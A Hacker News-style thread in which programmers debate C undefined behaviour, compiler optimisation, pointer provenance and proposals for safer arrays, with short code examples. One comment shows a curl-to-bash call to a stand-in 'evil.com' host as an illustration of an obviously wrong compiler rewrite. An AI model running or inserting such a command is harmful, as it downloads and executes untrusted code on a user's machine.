Yes, that is a perfect example of buggy compiler handling of undefined behaviour. A non-buggy compiler would either behave in a manner chacteristic of the environment (ie read address array+i), ignore the situation entirely (which also results in reading array+i), or (preferably) issue a error to the effect of "possible array access out of bounds, suggest 'assert(i<10);' here".


Very well put (deliberately using the exact terminology used in the standard)!

Can we just make that binding again? After all, it used to be.

It should be obvious to compiler writers what the intention of the standard is, because it says so in the dang text, but since this was downgraded to a note and you are technically not in violation if you do something different, everyone now acts as if doing the exact opposite of what is written there is somehow OK.

The downgrade to note-status seemed to be predicted on the idea implementors can be trusted to do The Right Thing™ in these cases. It is now evidently clear that they cannot, so we have to force them.


> It should be obvious to compiler writers what the intention of the standard is, because it says so in the dang text, but since this was downgraded to a note and you are technically not in violation if you do something different, everyone now acts as if doing the exact opposite of what is written there is somehow OK.

Note that a compiler could be incapable of processing any useful programs whatsoever, and yet still be a "conforming C implementation" if it is capable of processing a deliberately contrived and useless program that exercises the Standard's translation limits. The authors of the Standard even acknowledge that possibility in the Rationale.

The problem is that the authors of the Standard recognized that anyone seeking to sell compilers would treat Undefined Behavior as an invitation to behave in whatever fashion would best meet their customers' needs, but failed to consider that a moderately-decent freely distributable compiler could become popular as a result of being freely distributable without its maintainers having to respect its users.


Yep, that is exactly my analysis of the situation: an actual compiler vendor would never (could never) pull any of these stunts, or they'd simply go out of business in a jiffy. Alas, we all got suckered into "free", and now the compiler writers no longer listen to their users, because they are not their customers.

Their customers are they PhD advisers and Google, Apple and maybe a few more "whales" as Stonebraker described them, lamenting a similar situation in databases. Their needs are almost completely different from the rest of us!

For Google, a 0.1% performance improvement in one of their key applications is worth quite a bit of extra pain for their own developers, and pretty much an infinite amount of pain for other developers.

https://www.youtube.com/watch?v=DJFKl_5JTnA


BTW, what do you think of the suggested text I offered near the top of this thread, that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes? It's too late to go back in time and add that to C89 or C99, but a lot of insanity could have been avoided had such text been present.

Further, instead of characterizing as UB all situations where a useful optimization might affect the behavior of a program, it would be far much safer and more useful to allow particular optimizations in cases where their effects might be observable, but where all allowable resulting behaviors would meet application requirements.

As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate", I would say that if the exit of a loop is reachable, and no individual action within the loop would be observably sequenced with regard to some particular succeeding operation, a compiler may at its leisure reorder the succeeding operation ahead of the loop. Additionally, if code gets stuck in a loop with no side effects that will never terminate, an implementation may provide an option to raise a signal to indicate that.

If a function is supposed to return a value meeting some criterion, and it would find such a value in all cases where a program could execute usefully, but the program would do something much worse than useless if the function were to return a value not meeting the criteria, a program execution where the function loops forever may be useless, and may be inferior to one that gets abnormally terminated by the aforementioned signal, but may be infinitely preferable to one where the function, as a result of "optimization", returns a bogus value. Allowing a programmer to safely write a loop which might end up not terminating would make it possible to yield more efficient machine code than would be needed if the only way to prevent the function from returning a bogus value would be to include optimizer-proof code to guard against the endless-loop case.


> that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes?

This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

> As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate"

This is actually completely unneeded, even for optimisation. If a side effect can be hoisted out of a loop at all, it can be hoisted regardless of whether the loop terminates. If the code (called from) inside the loop can (legally) observe the side effect, then it can't be hoisted even if the loop does always terminate. If code outside the loop observes the side effect, then either the loop terminates (and whatever lets you hoist terminating-loop side effects applies) or the code outside the loop is never executed (and thus can't observe any side effects, correct or incorrect).


> This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

I would have no qualm with the way clang and gcc process various constructs if they were to explicitly state that its maintainers make no effort to make their optimizer suitable for any tasks involving the receipt of untrustworthy input. Instead, however, they claim that their optimizers are suitable for general-purpose use, despite the fact that their behavior isn't reliably suitable for many common purposes.

> This is actually completely unneeded, even for optimisation.

Consider the following function:

    unsigned long long test(unsigned long long x, int mode)
    {
      do
        x = slow_function_no_side_effects();
      while(x > 1);
      if (mode)
        return 1;
      else
        return x;
    }
Suppose the function is passed a value of "x" which would get caught in a cycle that never hits zero or one, but "mode" is 1. If the code is processed by performing every individual step in order, the function would never return. The rule in C11 is designed to avoid requiring that generated code compute the value of x when its only possible effect on the program's execution would be to prevent the execution of code that doesn't depend on its value.

Suppose the most important requirement that function test() must meet is that it must never return 1 unless mode is 1, or the iteration on x would yield 1 before it yields zero; returning 1 in any other cases would cause the computer's speaker to start playing Barney's "I love you" song, and while looping endlessly would be irksome, it would be less bad than Barney's singing. If a compiler determines that slow_function_no_side_effects() will never return an even number, should it be entitled to generate code that will return 1 when mode is zero, without regard for whether the loop actually completes?

I would think it reasonable for a compiler to defer/skip the computation of x in cases where mode is 1, or for a compiler that can tell that "x" will never be an even number to generate code that, after ensuring that the loop will actually terminate, would unconditionally return 1. Requiring that the programmer write extra code to ensure that the function not return 1 in cases where mode is zero but the loop doesn't terminate would defeat the purpose of "optimization".


Do you mean `x = slow_function_no_side_effects( x );`? Because if slow_function_no_side_effects really doesn't have side effects, then your version is equivalent to:

  x = slow_function_no_side_effects(); /* only once */
  if(x > 1) for(;;) { /* infinite loop */ }
  return mode ? 1 : x;
That said, I suppose it might be reasonable to explicitly note that a optimiser is allowed to make a program or subroutine complete in less time than it otherwise would, even that reduces the execution time from infinite to finite. That doesn't imply inferring any new facts about the program - either loop termination or otherwise - though. On the other hand it might be better to not allow that; you could make a case that the optimisation you describe is a algorithmic change, and if the programmer wants better performance, they need to write:

  unsigned long long test(unsigned long long x, int mode)
    {
    if(mode) return 1; /* early exit */
    do x = slow_function_no_side_effects(x);
    while(x > 1);
    return x;
    }
, just the same as if they wanted their sorting algorithm to complete in linear time on already-sorted inputs.


Yeah, I meant `slow_function_no_side_effects(x)`. My point is that there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

In a broader sense, I think the problem is that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior, and consequently any action that would make the effects of an optimization visible must be characterized as UB.

I think it would be far more useful to recognize that optimizations may, on an opt-in or opt-out basis, be allowed to do various things whose effects would be observable, and correct programs that would allow such optimizations must work correctly for any possible combination of effects. Consider the function:

    struct blob { uint16_t a[100]; } x,y,z;

    void test1(int *dat, int n)
    {
      struct blob temp;
      for (int i=0; i<n; i++)
        temp.a[i] = i;
      x=temp;
      y=temp;

    }
    void test2(void)
    {
      int indices[] = {1,0};
      test1(indices, 2);
      z=x;
    }
Should the behavior of test2() be defined despite the fact that `temp` is not fully written before it is copied to `x` and `y`? What if anything should be guaranteed about the values of `x.a[2..99]`, `y.a[2..99]`, and `z.a[2..99]`?

While I would allow programmer to include directives mandating more precise behavior or allowing less precise behavior, I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match. My rationale would be that a programmer who sees `x` and `y` assigned from `temp` would be able to see where `temp` was created, and would be able to see that some parts of it might not have been written. If the programmer cared about ensuring that the parts of `x` and `y` corresponding to the unwritten parts matched, there would be many ways of doing that. If the programmer fails to do any of those things, it's likely because the programmer doesn't care about those values.

The programmer of function `test2()`, however, would generally have no way of knowing whether any part of `x` might hold something that won't behave as some possibly-meaningless number. Further, there's no practical way that the author of `test2` could ensure anything about the parts of `x` corresponding to parts of `temp` that don't be written. Thus, a compiler should not make any assumptions about whether a programmer cares about whether `z.a[2..99]` match `x.a[2..99]`.

A compiler's decision to optimize out assignments to `x[2..99]` and `y[2..99]` may be observable, but if code would not, in fact, care about whether `x[2..99]` and `y[2..99]` match, the fact that the optimization may cause the arrays to hold different Unspecified values should not affect any other aspect of program execution.


> there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

Yes, definitely true. It's debatable whether it's okay for a compiler to rewrite code as in second example at https://news.ycombinator.com/item?id=22903396 , but it is not debatable that rewriting it as with anything equivalent to:

  if(x > 1 && x == slow_function_no_side_effects(x))
    { system("curl evil.com | bash"); }
is a compiler bug, undefined behaviour be damned.

> that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior

I don't know if this quite characterizes the actual reasoning, but it does seem like a good summary of the overall situation, with "we might do x0 or x1, so x is undefined behaviour" ==> "x is undefined, so we'll do x79, even though we know that's horrible and obviously wrong".

> I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match.

Actually, I'm not sure that makes sense; your code is equivalent to:

  struct blob { uint16_t a[100]; } x,y,z;
  
  void test2(void)
    {
    int indices[] = {1,0};
    ; {
      int* dat = indices;
      int n = 2;
      ; {
        struct blob temp;
        for(int i=0; i<n; i++) temp.a[i] = i;
        /* should that be dat[i] ? */
        x=temp;
        y=temp;
        }
      }
    z=x;
    }
I don't think it makes sense to treat x=temp differently from z=x. Maybe if you treat local variables (temp) differently from global variables (x,y,z) but that seems brittle. (What happens if x,y,z are moved inside test2? What if temp is moved out? Does accessing some or all of them through pointers change things?)


The indent is getting rather crazy on this thread; I'll reply further up-thread so as to make the indent less crazy.


Replying to the code [discussed deeper in this sub-thread]:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp;
          for(int i=0; i<n; i++) 
            temp.a[dat[i]] = i; // This is what I'd meant
          x=temp;
          y=temp;
        }
        z=x;
      }
The rewrite sequence I would envision would be:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp1 = x; // Allowed initial value
          struct blob temp2 = y; // Allowed initial value
          for(int i=0; i<n; i++)
          {
            temp1.a[dat[i]] = i;
            temp2.a[dat[i]] = i;
          }
          x=temp1;
          y=temp2;
        }
        z=x;
      }
Compilers may replace an automatic object whose address is not observable with two objects, provided that anything that is written to one will be written to the other before the latter is examined (if it ever is). Such a possibility is the reason why automatic objects which are written between "setjmp" and "longjmp" must be declared "volatile".

If one allows a compiler to split "temp" into two objects without having to pre-initialize the parts that hold Indeterminate Value, that may allow more efficient code generation than would be possible if either "temp" was regarded as holding Unspecified Value, or if copying a partially-initialized object as classified as "modern-style Undefined Behavior", making it necessary for programmers to manually initialize entire structures, including parts whose values would otherwise not observably affect program execution.

The optimization benefits of attaching loose semantics to objects of automatic duration whose address is not observable are generally greater than the marginal benefits of attaching those semantics to all objects. The risks, however, are relatively small since everything that could affect the objects would be confined to a single function (it an object's address is passed into another function, its address would be observable during the execution of that function).

BTW, automatic objects whose address isn't taken have behaved somewhat more loosely than static objects even in compilers that didn't optimized aggressively. Consider, for example:

    volatile unsigned char x,y;
    int test(int dummy, int mode)
    {
      register unsigned char result;
      if (mode & 1) result = x;
      if (mode & 2) result = y;
      return result;
    }
On many machines, if an attempt to read an uninitialized automatic object whose address isn't taken is allowed to behave weirdly, the most efficient possible code for this function would allocate an "int"-sized register for "result", even though it's only an 8-bit type, do a sign-extending load from `x` and/or `y` if needed, and return whatever happens to be in that register. That would not be a complicated optimization; in fact, it's a simple enough optimization that even a single-shot compiler might be able to do it. It would, however, have the weird effect of allowing the uninitialized "result" object of type "unsigned char" to hold a value outside the result 0..255.

Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?


  >   temp.a[dat[i]] = i; // This is what I'd meant
I see.

  >   struct blob temp1 = x; // Allowed initial value
With, I presume, a eye toward further producing:

  x.a[dat[i]] = i;
  y.a[dat[i]] = i;
?

> Compilers may replace an automatic object whose address is not observable with two objects,

That makes sense.

> do a sign-extending load from `x` and/or `y`

I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

> Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?

Of course not. Result (assuming mode&3 == 0) is undefined, and behaviour characteristic of the environment is that result (aka eg eax) can hold any (say) 32-bit value (whether that's 0..FFFF'FFFF or -8000'0000..7FFF'FFFF depends on what operations are applied, but `int` suggests the latter).

None of this involves that the compiler infering objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.


> With, I presume, a eye toward further producing: x.a[dat[i]] = i; y.a[dat[i]] = i;

Bingo.

> I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

Naturally.

> None of this involves that the compiler infering objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.

Thus the need to use an abstraction model which allows optimizations to alter observable aspects of a program whose behavior is, generally, defined. I wouldn't describe such things as "behavior characteristic of the environment", though the environment would affect the ways in which the effects of optimizations might be likely to manifest themselves.

Note that programs intended for different tasks on different platforms will benefit from slightly--but critically--different abstraction models, and there needs to be a way for programs to specify when deviations from the "load/store machine model" which would normally be acceptable, aren't. For example, there should be a way of indicating that a program requires that automatic objects always behave as though initialized with Unspecified rather than Indeterminate Value.

A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

Consider, for example:

    typedef void proc(int);  // Ever seen this shorthand for prototypes?
    proc do_something1, do_something2, do_something3;

    void test2(int z)
    {
      if (z < 60000) do_something3(z);
    }

    int q;
    void test1(int x)
    {
      q = x*60000/60000;
      if (q < 60000) do_something1(q);
      int y = x*60000/60000;
      if (y < 60000) do_something2(y);
      test2(y);
    }
Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

There could be optimization value in allowing a compiler to treat automatic objects "symbolically", allowing the second assignment/test combination to become:

      if (x*60000/60000 < 60000) 
        do_something2(x*60000/60000);
even though the effect of the substituted expression might not be consistent. I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees against them for local automatic objects whose address is not taken. On the other hand, there would need to be an operator which, when given an operand with a non-determinisitic value, would choose in Unspecified fashion from among the possibilities; to minimize security risks that could be posed by such values, I would say that function arguments should by default behave as though passed through that operator.

The guiding principle I would use in deciding that the value substitution would be reasonable when applied to y but not q or z would be that a programmer would be able to see how y's value is assigned, and see that it could produce something whose behavior would be "unusual", but a programmer looking at test2() would have no reason to believe such a thing about z.


> I wouldn't describe such things as "behavior characteristic of the environment",

`result` being a 32-bit integer (register) of dubious signedness is behaviour characteristic of the environment, which the implementation is sometimes obliged to paper over (eg with `and eax FF`) in the interests of being able to write correct code.

> A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

> Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

Yes, clearly.

> I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees

In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long -Ono-unsafe exists and is the default.


> Yes, clearly.

Unfortunately, the C Standard doesn't specify an abstraction model that is amenable to the optimization of usable programs.

> In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long -Ono-unsafe exists and is the default.

The only reason for contention between compiler writers and programmers is a desire to allow compilers to optimized based upon the assumption that a program won't do certain things. The solution to that contention would be to have a means of inviting optimizations in cases where they would be safe and useful, analogous to what `restrict` would be if the definition of "based upon" wasn't so heinously broken.


> to allow compilers to optimized based upon the assumption that a program won't do certain things.

Emphasis mine. This is always wrong. Correct (and thus legitimate-to-optize-based-on) knowledge of program behavior is derived by actually looking at what the program actually does, eg "p can never be NULL because if is was, a previous jz/bz/cmovz pc would have taken us somewhere else"[0]. Optimising "based on" undefined behaviour is only legitimate to the extent that it consists of choosing the most convenient option from the space of concrete realizations of particular undefined behaviour that are consistent with the environment (especially the hardware).

0: Note that I don't say "a previous if-else statement", because when we say "p can never be NULL", we're already in the process of looking for reasons to remove if-else statements.


There are many cases where accommodating weird corner cases would be expensive, and would only be useful for some kinds of program. Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency. The problem is that there's no way for programs to specify which corner cases they do or don't need.


> Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency.

Yes, that's what undefined behaviour is for. Eg requiring that implementations handle integer overflow needlessly degrades efficiency of the overwhelming majority of tasks where integers do not if fact overflow.

> The problem is that there's no way for programs to specify which corner cases they do or don't need.

Wait, are you just asking (the situationally appropriate equivalent of) `(int32_t)((uint32_t)x+(uint32_t)y)` and/or `#pragma unsafe assert(p!=NULL)`? Because while it's a shame the standard doesn't provide standardized ways to specify these things (as I admitted upthread) programs are prefectly capable of using the former, and implementations are perfectly capable of supporting the latter; I'm just arguing that the defaults should be sensible.


In many cases, the semantics programmers would require are much looser than anything provided for by the Standard. For example, if a programmer requires an expression that computes (x \* y / z) when there is no overflow, and computes an arbitrary value with no side effects when there is an overflow, a programmer could write the expression with unsigned and signed casting operators, but that would force a compiler generate machine code to actually perform the multiplication and division even in cases where it knows that y will always be twice z. Under "yield any value with no side effects" semantics, a compiler could replace the expression with (x \* 2), which would be much faster to compute.


This is a common misconception (or poor way of phrasing it, sorry). Compiler implementers don't go looking for instances of undefined behavior in a program with the goal of optimizing it in some way. There is little value in optimizing invalid code. The opposite is the case.

But we must write code that relies on the same rules and requirements that programs are held to (and vice versa). When either party breaks those rules, either accidentally or deliberately, bad things happen.

What sometimes happens is that code written years or decades ago relies on the absence of an explicit guarantee in the language suddenly stops working because a compiler change depends on the assumption that code doesn't rely on the absence of the guarantee. That can happen as a result of improving optimizations, which is often but not not necessarily always motivated by improving the efficiency of programs. Better analysis can also help find bugs in code or avoid issuing warnings for safe code.


The fact that the Standard does not impose requirements upon how a piece of code behaves implies that the code is not strictly conforming, but the notion that it is "invalid" runs directly contrary to the intentions of the C89 and C99 Standards Committees, as documented in the published C99 Rationale. That document recognizes Undefined Behavior as, among other things, "identifying avenues of conforming language extension". Code that relies upon such extensions may be non-portable, but the authors of the Standard have expressly said that they did not wish to demean useful programs that happen to be non-portable.


There are rules and requirements documented in the spec, and there are de-facto rules and requirements that programs expect. Not only that, but when they do exploit these rules, often the code generated is obviously incorrect, and could have been flagged at compile time.

Right now, it seems like compiler vendors are playing a game of chicken with their users.


I think the issue is that many of these "obviously incorrect" things are not obvious at the level that the optimizations are taking place. Perhaps it would be worth considering adding higher-level passes in the compiler that can detect these kinds of surprising changes and warn about them.


Well, no, the issue is that the compiler writers refuse to acknowledge the these obviously incorrect things are incorrect in the first place and tend to blame users for tripping over compiler bugs. If it were just that they didn't know how to fix said bugs, that would be a qualitatively different and much less severe problem.


> not obvious at the level that the optimizations are taking place

Hmm...then it's up to the optimisers to up their game.

Optimisation is supposed to be behaviour-preserving. Arguing that almost all real-world programs invoke UB and therefore don't have well-defined behaviour (by the standard as currently interpreted) is a bit of a cop-out.


> This is a common misconception (or poor way of phrasing it, sorry). Compiler implementers don't go looking for instances of undefined behavior in a program with the goal of optimizing it in some way. There is little value in optimizing invalid code. The opposite is the case.

Compilers do deliberately look to optimize loops with signed counters by exploiting UB to assume that they will never wrap.


I'd say both statements are correct.

Compiler implementers are happy when they don't have to care about some edge case because then the code is simpler. Thus, only for unsigned counters there is the extra logic to compile them correctly.

That is my interpretation of "The opposite is the case". Writing a compiler is easier with lots of undefined behavior.


But that's backwards, the compiler writers are writing special cases to erase checks in the signed case. Doing the 'dumb' thing and mindlessly going through the written check is simpler which is why that's what compilers did for decades as de facto standard on x86.


The dump thing is a non optimizing compiler. GCC and LLVM contain many optimization phases. It is probably some normal optimization which is only "wrong" in the context of loop conditions.


Well yes, they assume they never wrap because that is not allowed by the language, by definition. UB are the results of broken preconditions at the language level.


Terminology can go either way, but is it such a good idea what gcc actually does?


I would say that there is a lot of concern in the committee about how compilers are optimizing based on pointer providence. There has been a study group looking at this. It now appears that they are likely to publish their proposal as a Technical Report.


"based on pointer providence"

I think you meant "provenance" (mentioning it for the sake of anyone who wants to search for it).


Yes, my mistake--I was thinking of Rhode Island. I wrote a short bit about this at https://www.nccgroup.trust/us/about-us/newsroom-and-events/b... if anyone is interested.


What makes pointer provenance really great is that clang and gcc will treat that pointers that are observed to have the same address as freely interchangeable, even if their provenance is different. Clang sometimes even goes so far with that concept that even uintptr_t comparisons won't help.

    extern int x[],y[];
    int test(int i)
    {
        y[0] = 1;
        if ((uintptr_t)(x+5) == (uintptr_t)(y+i))
            y[i] = 2;
        return y[0];
    }
If this function is invoked with i==0, it should be possible for y[0] and the return value to both be 1, or both be 2. If x has five elements, however, and y immediately follows it, clang's generated code will set y[0] to 2 and yet return 1. Cool, eh?


What's the best way to keep an eye out for that TR? Periodically checking http://www.open-std.org/jtc1/sc22/wg14/ ?

I can't ever tell if I'm looking in the right place. :)


If you're interested in the final TR, I would imagine we'd list it on that page you linked. If you're interested in following the drafts before it becomes published, you'd fine them on http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log... (A draft has yet to be posted, though, so you won't find one there yet.)


Why would a vendor be unhappy about that? They have a large library using this deprecated syntax? Or many customers? It seems like a relatively easy fix to existing code.


The usual argument is: once you've verified some piece of code is correct, changing it (even when there should be no functional change in the semantics) carries risk. Some customers have C89-era code that compiles in C17 mode and they don't want to change that code because of these risks (perhaps the cost of testing is prohibitively expensive, there may be contractual obligations that kick in when changing that code, etc).


Well, one argument is that the vendors should not compile C89 code as C17. If you write C89, then stick with -std=c89 (or upgrade to the latest officially compatible revision).

It makes sense to preserve language compatibility within several language revisions, gradually sunsetting some features, but why do that for the eternity? Gradual de-supporting would push the problem to the compilers, but while it is no fun supporting, let's say, C89 and a hypothetical incompatible language C3X, this is where the effort should go (after all, companies with the old codebases can stick with older compilers). There is a great value in paving a way for a more fundamental C language simplifications and clean ups.


These are all good points, and I don't see a legitimate, technical reason to avoid deprecating and eliminating identifier list syntax in new C standards (but then, I'm not as much of an expert as some people, so I might be missing something important).

That having been said, a compiler vendor has, almost by definition as its first priority, an undeniable interest in keeping customers happy while, at the same time, ensuring strong reasons to see value in a version upgrade. When dealing with corporate enterprise customers, that often means offering new features without deprecating old features, because the customers want the new features but don't want to have to rewrite anything just because of a compiler upgrade.

They'll want C17 (and C32, for that matter) hot new features, but they will not want to pay a developer to "rewrite code that already works" (in the view of middle managers).

That's why I think they'd most likely complain. Their concerns about removing identifier lists likely have nothing at all to do with good technical sense. Ideally, if you don't want to rewrite your rickety old bit-rotting shit code, you should just continue compiling it with an old compiler, and if you want new language features you should use them in new language standard code, period, but business (for pathological, perhaps, but not really upstream-curable reasons) doesn't generally work that way.


One alternative at that point is to just ignore the fact that the deprecated feature is now removed and continue supporting it in your compiler. Maybe you hide standards compliance behind a flag. Annoying and more overhead, but saves your clients from spending dollars on upgrading their obsolete code.


Yep. That happens a lot, in practice.


Looks like that proposal is dropping support for K&R function declarations, is that right?


yes, that is correct.


> Proper array support (which passes around the length along with the data pointer).

I second this one. One of the best things from Rust is its "fat pointers", which combine a (pointer, length) or a (pointer, vtable) pair as a single unit. When you pass an array or string slice to a function, under the covers the Rust compiler passes a pair of arguments, but to the programmer they act as if they were a single thing (so there's no risk of mixing up lengths from different slices).


The C family has already evolved in this direction decades ago. Have you heard of C++ (Cee Plus Plus)?

It is production-ready; if you want a dialect of C with arrays that know their length, you can use C++. If you wanted a dialect of C in 1993 with arrays that know their length for use in a production app you could also have used C++ then.

The problem with all these "can we add X to C" is that there is always an implicit "... but please let us not add Y, Z and W, because that would start to turn C into C++, which we all agree that we definitely don't want or need."

The kicker is that everyone wants a different X.

Elsewhere in this thread, I noticed someone is asking for namespace { } and so it goes.

C++ is the result --- is that version of the C language --- where most of the crazy "can you add this to C" proposals have converged and materialized. "Yes" was said to a lot of proposals over the years. C++ users had to accept features they don't like that other people wanted, and had to learn them so they could understand C++ programs in the wild, not just their own programs.


C++ introduces a shit-ton of stuff that one often doesn't want, and even Bjarne Stroustrup (who many content has never seen a language feature he didn't want) has been a little alarmed at the sheer mass of cruft being crammed into recent updates to the standard. I know many C++ people think C++ is pure improvement over C in all contexts and manners, but it's not. It's different, and there are features implemented in C++ and not in C that could be added to C without damaging C's particular areas of greatest value, and many other features in C++ that would be pretty bad for some of C's most important use cases.

C shouldn't turn into C++, or even C++ Lite™, but it shouldn't remain strictly unchanging for all eternity, either. It should just always strive to be a better C, conservatively, because its niche is one where conservative advancement is important.

Some way to adopt programming practices that guaranteee consistent management of array and pointer length -- not just write code to check it, but actually guarantee it -- would, I think, perfectly fit the needs of conservative advancement suitable to C's most important niche(s). It may not take the form of a Rust-like "fat pointer". It may just be the ability to tell the compiler to enforce a particular constraint for relationships between specific struct fields/members (as someone else in this discussion suggested), in a backward-compatible manner such that the exact same code would compile in an older-standard compiler -- a very conservative approach that should, in fact, solve the problem as well as "fat pointers".

There are ways to get the actually important upgrades without recreating C++.


> C++ introduces a shit-ton of stuff that one often doesn't want

The point in my comment is that every single item in C++ was wanted and championed by someone, exactly like all the talk about adding this and that to C.

> C shouldn't turn into C++

Well, C did turn into C++. The entity that gave forth C++ is C.

Analogy: when we say "apes turned into humans", we don't mean that apes don't exist any more or are not continuing to evolve.

Since C++ is here, there is no need for C to turn into another C++ again.

A good way to have a C++ with fewer features would be to trim from C++ rather than add to C.


Sure, but theres a vast space between the C and C++ approaches. You don't have to say yes to everything to say yes to a few things. I would suggest that better arrays are an example of something that pretty much everybody wants.


But if you want better arrays you want operator overload to be able to use these arrays as 1st class citizens without having to use array_get(arr, 3), array_len(arr), array_concatenate(arr1, arr2) etc... You want to be able to write "arr[3]", "arr.len()", "arr1 += arr2" etc... To implement operator overload you might need to add the concept of references.

If you want your arrays type-safe you'll need dark macro magic (actually possible in the latest standards I think) or proper templates/generics.

If you really want to make your arrays convenient to use you'll want destructors and RAII.

Then you'd like to be able to conveniently search, sort and filter those arrays. That's clunky without lambdas.

And once you get all that, why not move semantics and...

Conversely if you don't want any of this what's wrong with:

    struct my_array {
        my_type_t *buf;
        size_t len;
    }
I don't think it's worth wasting time standardizing that, especially since I'd probably hardly ever use that since it doesn't really offer any obvious benefits and "size_t" is massively overkill in many situations.


> But if you want better arrays you want operator overload to be able to use these arrays as 1st class citizens without having to use array_get(arr, 3), array_len(arr), array_concatenate(arr1, arr2) etc... You want to be able to write "arr[3]", "arr.len()", "arr1 += arr2" etc...

I don't think that's true at all.

1. "arr[3]" syntax can just be part of the language.

2. For length, we already have the "sizeof()" syntax, although admittedly it is a compile-time construct and expanding it to runtime could be confusing. I am ok with using a standard psuedo-function for array-len and would absolutely prefer it to syntax treating first-class arrays as virtual structs with virtual 'len' members.

3. I don't think any C practitioner wants "arr1 += arr2" style magic.

So I don't buy that there is a need for operator overload; the rest of your claims that this is basically an ask for C++ follow baselessly from that premise.


> Conversely if you don't want any of this what's wrong with:

As I suggested, adding a(n optional) constraint such that "buf" can be limited by "len" in such a struct is a possible approach to offering safer arrays. Such a change seems like it kinda requires a change to the language.


Apparently not everyone, otherwise it would be part of ISO C already, and it hasn't been for lack of trying.


Not literally everyone, I would think, but the previous statement could, in theory, still be true. It would just require some people to want something else, conflicting with that desire, even more.

I know, this is pedantic, I suppose. Mea culpa.


> every single item in C++ was wanted and championed by someone

This is irrelevant to the point I made in the text you quoted.

> Well, C did turn into C++. The entity that gave forth C++ is C.

My mother didn't turn into me. She just gave rise to me. She's still alive and well.

My point, which seems to have completely escaped you, is that C itself should not turn into C++, so claims that any attempt at all ever to improve C with the addition of a single constraint mechanism for managing pointer size safely is a slipper slope to duplicating what C++ has become, leaving no non-C++ C language in its wake -- well, such claims seem unlikely to be an unavoidable Truth.

> A good way to have a C++ with fewer features would be to trim from C++ rather than add to C.

Again, my point is not easily crammed into the round hole of your idea of how things worked. It is, instead, that C can have a few more safety features without becoming "C++ with fewer features".

I feel like you didn't read my previous message as a whole at all given the way you responded to it, and just looked for trigger words you could use to push some kind of preconceived notions.


That should have said "many contend". Now it seems too late to edit.


> if you want a dialect of C with arrays that know their length, you can use C++

C++ doesn't have arrays which know their length.


What's std::array then?

> combines the performance and accessibility of a C-style array with the benefits of a standard container, such as knowing its own size

https://en.cppreference.com/w/cpp/container/array


They're objects that mostly behave like arrays. You can't index element two of std::array foo as 1[foo] since it isn't an actual C array.


A Pascal array is just ones and zeros that behave like an array. So is a Fortran array.

> You can't index element two of std::array foo as 1[foo] since it isn't an actual C array.

That's just a silly quirk of C syntax that is deliberately not modeled in C++ operator overloading. It's not a real capability; it doesn't make arrays "do" anything new, so it' hard to call it an array behavior. It's a compiler behavior, that's for sure.

